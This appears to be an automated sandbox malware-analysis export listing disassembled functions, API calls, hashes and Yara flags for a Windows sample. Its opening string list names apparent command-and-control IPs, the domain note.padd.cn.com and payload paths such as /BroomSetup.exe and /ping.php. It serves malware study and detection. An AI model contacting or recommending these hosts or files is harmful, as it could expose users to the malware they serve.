String ID: @$ iC$.exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com
API String ID: 2531350358-3920416335
Opcode ID: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
Instruction ID: 155fe2cc8e4fa4e46dc6fa4680c732f603c5f943b5d660f0be767ab9361972ec
Opcode Fuzzy Hash: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
Instruction Fuzzy Hash: 5DA2121C40B3D0EFC652F77C58567CE2BE09B5B280F9468ADE6B45F326CB64424887DA

Uniqueness

Uniqueness Score: -1.00%

Function 0042086B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetUserDefaultLCID.KERNEL32 ref: 00420977
IsValidCodePage.KERNEL32(00000000), ref: 004209D2
IsValidLocale.KERNEL32(?,00000001), ref: 004209E1
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420A29
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00420A48

Strings

,CUSA, xrefs: 004208D0

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: ,CUSA
API String ID: 745075371-2978500865
Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction ID: 7ddd42caa13bcc6a581a5d9380eb1867f4bda1d866acf156490288d52a5f9f8d
Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction Fuzzy Hash: 2351A4B1B002299BEB20DFA5EC45BBF77F8AF04700F54056BE505E7252D7789980CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042140C Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00421552

Strings

1#INF, xrefs: 0042275F
1#SNAN, xrefs: 00422751
1#QNAN, xrefs: 00422758
1#IND, xrefs: 0042274A

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
Instruction ID: ba3d8f5800837f2e7df06b198bc907b13d59b0e20819b9a43c463b3a9b279e29
Opcode Fuzzy Hash: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
Instruction Fuzzy Hash: 04C25A71E082289FDB25CE28ED407EAB7B5EB94304F5541EBD84DE7250E778AE818F44

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF33 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

IsValidCodePage.KERNEL32(00000000), ref: 00420015
_wcschr.LIBVCRUNTIME ref: 004200A5
_wcschr.LIBVCRUNTIME ref: 004200B3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00420156

Strings

,CUSA, xrefs: 0041FF71

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: ,CUSA
API String ID: 4212172061-2978500865
Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction ID: fa09c2a12b3627a5d585845c4e70effd6588540dd04b31b38b5545ebe516d264
Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction Fuzzy Hash: 2C610871700216AAE724AB35EC42BEB77E8EF04314F14403FF505D7282EA79E986C769

Uniqueness

Uniqueness Score: -1.00%

Function 031708FE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 03170997
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 031709C0
GetACP.KERNEL32 ref: 031709D5

Strings

ACP, xrefs: 0317091C
OCP, xrefs: 03170952

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction ID: c88a84a79bafb99793c76a93ed954c5a6b049afaa2e21b1f691137b590b5be66
Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction Fuzzy Hash: 9E21A432B40305ABFB34CF55C911BA7B3BAAB4CA64B5E84A5E94DD7100E732DA81C390

Uniqueness

Uniqueness Score: -1.00%

Function 00420697 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00420730
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00420759
GetACP.KERNEL32 ref: 0042076E

Strings

OCP, xrefs: 004206EB
ACP, xrefs: 004206B5

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction ID: ccfaff94e51ab864e712d9520aeba98098d7830e350b78e24d8ea24043a496f3
Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction Fuzzy Hash: 8821F422B00125ABD7308F14E900A9BB3E6ABD4B50BD68176E90AD7312E736ED41CB48

Uniqueness

Uniqueness Score: -1.00%

Function 03170AD2 Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE

Part of subcall function 03166F80: _free.LIBCMT ref: 03166FDF
Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FEC

GetUserDefaultLCID.KERNEL32 ref: 03170BDE
IsValidCodePage.KERNEL32(00000000), ref: 03170C39
IsValidLocale.KERNEL32(?,00000001), ref: 03170C48
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 03170C90
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 03170CAF

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction ID: 8bfe97f9ee4e282fe41413a68d4a9909e242b36c54fd691736fa430764e0a445
Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction Fuzzy Hash: 27516175A00319ABDF20DFA5CC48ABEB3B8AF0C708F4D4569E915EB190E7719A44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004123A0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

y%B, xrefs: 00412808, 004125F2, 00412481
y%B, xrefs: 004123BD, 00412568, 0041278C, 00412726, 004125B6, 00412544

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID:
String ID: y%B$y%B
API String ID: 0-2510245575
Opcode ID: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
Instruction ID: 7f81a5055d29d3c9b3a65b9dd9c97bea9b47a5c616e9cad61c519a63aba044dd
Opcode Fuzzy Hash: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
Instruction Fuzzy Hash: F8024C71E002199FDF14CFA9D9806EEB7F1FF88314F25826AD819E7380D774AA518B94

Uniqueness

Uniqueness Score: -1.00%

Function 0317019A Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE

IsValidCodePage.KERNEL32(00000000), ref: 0317027C
_wcschr.LIBVCRUNTIME ref: 0317030C
_wcschr.LIBVCRUNTIME ref: 0317031A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 031703BD

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction ID: 98e7c4b49175539d5c87692572d705dbabbe2ec0347a02fe1d3fe0106f65bbfb
Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction Fuzzy Hash: B061D476600306ABD724EBB4DC45BBAB3BCEF0C300F1D446AE949DB190EB74E95187A4

Uniqueness

Uniqueness Score: -1.00%

Function 0042031E Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420372
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004203C3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420483

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
Instruction ID: 150eb58c917d6dfbd7f4c2a18d44eb002ac57a30d794a2eb47e087b0f294e0c3
Opcode Fuzzy Hash: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
Instruction Fuzzy Hash: D46185717001279BDB28DF25DC81BB677E8EF14344F50807AE905C6642E77CE995CB58

Uniqueness

Uniqueness Score: -1.00%

Function 031609A2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 03160A9A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 03160AA4
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 03160AB1

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction ID: 088bcf44a0e09931f7bd34cc81764740796b3d0ed19959cf3fc0d6e30edb20d7
Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction Fuzzy Hash: 1F31B27490122CDBCF21DF64DC89B99BBB8BF08310F5441EAE81CA7250E7709B958F55

Uniqueness

Uniqueness Score: -1.00%

Function 0041073B Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00410833
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041083D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041084A

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction ID: d1fab33c372cae0273f805137467810c70e9cba24fd9c5a15224a60e011b092e
Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction Fuzzy Hash: E031C47490121C9BCB21EF25D9887CDB7B8BF08310F5041EAE41CA7291E7749F858F88

Uniqueness

Uniqueness Score: -1.00%

Function 03163C4E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,03163C24,00000003,00438DB0,0000000C,03163D7B,00000003,00000002,00000000,?,03162DD2,00000003), ref: 03163C6F
TerminateProcess.KERNEL32(00000000,?,03163C24,00000003,00438DB0,0000000C,03163D7B,00000003,00000002,00000000,?,03162DD2,00000003), ref: 03163C76
ExitProcess.KERNEL32 ref: 03163C88

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction ID: f8f748f7cf30447cab06716f2a0e96718b6dc4c31134b847042ca10b7e61d906
Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction Fuzzy Hash: 40E0BF35600609ABCF12AF94DD0CA693F79EB48285F444425FD564A131CB35DE62CA44

Uniqueness

Uniqueness Score: -1.00%

Function 0315092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 031509DC, 031509DF, 031509E4
l, xrefs: 03150966
., xrefs: 0315095F

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 0053dc82725b70ebe74e57aa7fad2cec671fd03b365222813dbdf76fa64f86a7
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 9B3139B6900609DFDB10CF99C880AAEFBF9FF4C324F15404AE855AB214D771EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004174E4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537

Strings

GetLocaleInfoEx, xrefs: 004174F5, 004174FF

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
Instruction ID: 87fd85214f38bea17e9e0867028b4e6f8bd84d2b32a19a69094aa8269c1633f8
Opcode Fuzzy Hash: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
Instruction Fuzzy Hash: 0AF0F631740218B7DB11AF61AC01FBE3B72DF04710F90007AFC0926291CA355E60969D

Uniqueness

Uniqueness Score: -1.00%

Function 03162607 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
Instruction ID: 6b6b485e5133a133c3f2fbefddda3f6173d19438d1b1243bf6469fc71b70f41c
Opcode Fuzzy Hash: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
Instruction Fuzzy Hash: F2022C71E012299FDF24CFA9C8806ADF7F5EF88314F198569D819EB384D731A952CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0315CA63 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

@, xrefs: 0315CA8A
@, xrefs: 0315CAAA

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction ID: f8e17c6c76a6252f05db26a26d0ded41de5b678eb732505d7586c008360bd1d3
Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction Fuzzy Hash: F2316036184382C7C715CF3CD4B41A2F781FAC936072D43D9E8A18F245D3669446C741

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7FC Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

@, xrefs: 0040C843
@, xrefs: 0040C823

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction ID: bacc100dc0a0088e2915408729627ff8f5d38c09acb905e5d4049eb219c2e84e
Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction Fuzzy Hash: 9E314B67144182CBD2049728C8E45B7B781FA8532272DC3FBD091AB7CAD23E9847960C

Uniqueness

Uniqueness Score: -1.00%

Function 004051B4 Relevance: 1.8, APIs: 1, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004051B9

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 651cb6eb15f4b96bd70d515a3bc273186fd9dd4463a1bf7c30f814969f20083e
Instruction ID: 3aa3e24c883bcef65b555e6e5d184397e63da5dbd41a8fa125ab18be998632de
Opcode Fuzzy Hash: 651cb6eb15f4b96bd70d515a3bc273186fd9dd4463a1bf7c30f814969f20083e
Instruction Fuzzy Hash: B1C1A171A01A16EFCB14CF24C481AABB7B2FF45304B54416AE842AB781D739FC52DF95

Uniqueness

Uniqueness Score: -1.00%

Function 0316B989 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,0316B984,00000000,?,00000008,?,?,03173766,00000000), ref: 0316BBB6

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction ID: 412ef274b18d5c4c09428428a174f6e508a4303d34e55e53b12ebabd41cc5d17
Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction Fuzzy Hash: BFB16D311146088FD719CF69C486B65BBE0FF49364F29C658E89ACF2A1C735DAA2CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0041B722 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041B71D,?,?,00000008,?,?,004234FF,00000000), ref: 0041B94F

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction ID: 77e1d80032caf57d447ccd467e54c4f0879ce58ba2590176158d9b4cb40e0a8d
Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction Fuzzy Hash: F4B13C71620608DFD715CF28C48ABA57BE0FF45364F298659E999CF3A1C339D982CB84

Uniqueness

Uniqueness Score: -1.00%

Function 031707D5 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE

Part of subcall function 03166F80: _free.LIBCMT ref: 03166FDF
Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 03170829

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction ID: 130052ec0222ade4481747999f554da9118da81ca7ed278911ea9e078d02e035
Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction Fuzzy Hash: 2D21957291030AABDB28EF64DC41BBA73BCEB4C310F1801BAED15DA140EB75E954CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0042056E Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205C2

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction ID: 81f412bf0acab0c669cc413bed1d2c5f28af9b0bc2236bf2d8b3c2af5f6810e7
Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction Fuzzy Hash: CD21A472A10126AFDB249F25EC41BBB73E8EB84314F50007BE905D6242EB78AD94CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0317045D Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE

EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 031704CF

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction ID: 77b395c3dcd8dd198c2679e93149b79d8edba3f64784eb1292a0109c098bc574
Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction Fuzzy Hash: 2C11253A6003019FDB18DF39D8A46BAB7A6FF88358B5C442DE98787A40D371B942CB40

Uniqueness

